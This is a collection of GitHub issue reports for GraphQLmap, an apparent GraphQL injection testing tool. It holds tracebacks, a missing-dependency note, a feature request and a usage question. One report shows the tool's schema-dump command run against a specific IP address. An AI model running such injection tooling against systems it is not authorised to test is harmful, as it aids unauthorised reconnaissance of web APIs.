e.g: name[Type]: arg (Type!)

Traceback (most recent call last):
File "/media/mrn03ody/Shoaib/H_Scripts/web/whiteH_Exploits/PayloadsAllTheThings/GraphQL Injection/GraphQLmap/graphqlmap.py", line 78, in
GraphQLmap(args)
File "/media/mrn03ody/Shoaib/H_Scripts/web/whiteH_Exploits/PayloadsAllTheThings/GraphQL Injection/GraphQLmap/graphqlmap.py", line 53, in init
dump_schema(self.url, self.method, 15, self.headers, self.use_json)
File "/media/mrn03ody/Shoaib/H_Scripts/web/whiteH_Exploits/PayloadsAllTheThings/GraphQL Injection/GraphQLmap/attacks.py", line 36, in dump_schema
for types in schema['data']['__schema']['types']:
KeyError: 'data'

Json Error

Error on dump_new command:

arthur@basidqh23ofia GraphQLmap]$ python graphqlmap.py -u http://35.190.155.168/24e52a10fc/graphql -v

GraphQLmap > dump_new
Traceback (most recent call last):
File "/home/arthur/Ferramentas/GraphQLmap/graphqlmap.py", line 78, in
GraphQLmap(args)
File "/home/arthur/Ferramentas/GraphQLmap/graphqlmap.py", line 53, in init
dump_schema(self.url, self.method, 15, self.headers, self.use_json)
File "/home/arthur/Ferramentas/GraphQLmap/attacks.py", line 31, in dump_schema
schema = r.json()
File "/usr/lib/python3.9/site-packages/requests/models.py", line 900, in json
return complexjson.loads(self.text, **kwargs)
File "/usr/lib/python3.9/json/init.py", line 346, in loads
return _default_decoder.decode(s)
File "/usr/lib/python3.9/json/decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python3.9/json/decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

Missing requirement

the package "idna" is missing from the requirements.txt file

strategy support

Leveraging #21, or even without full automation, it would be nice to allow implementing or choosing a (custom) strategy. By that I mean various ways to iterate over fields, randomly choose queries, and stuff like that. I can imagine additional CLI switches to choose from predefined strategies and/or exposing the utilities as a library and having an API to allow users to supply their own custom strategy implementations.
I am sadly not much of a Python expert, so I wouldn't yet know how; please drop your ideas and thoughts while I am looking further into options myself. Feedback is welcome!

name 'time' is not defined

I have this error :

I fixed it by adding import time at the beginign of attack.py

GraphQL in json body

Hi, I have a question. How to use this tool if the GraphQL query is inside the JSON body?

POST /graphql HTTP/1.1
Host: example.com

{"operationName":"test","query":"query test($input: test!).....\n}\n"}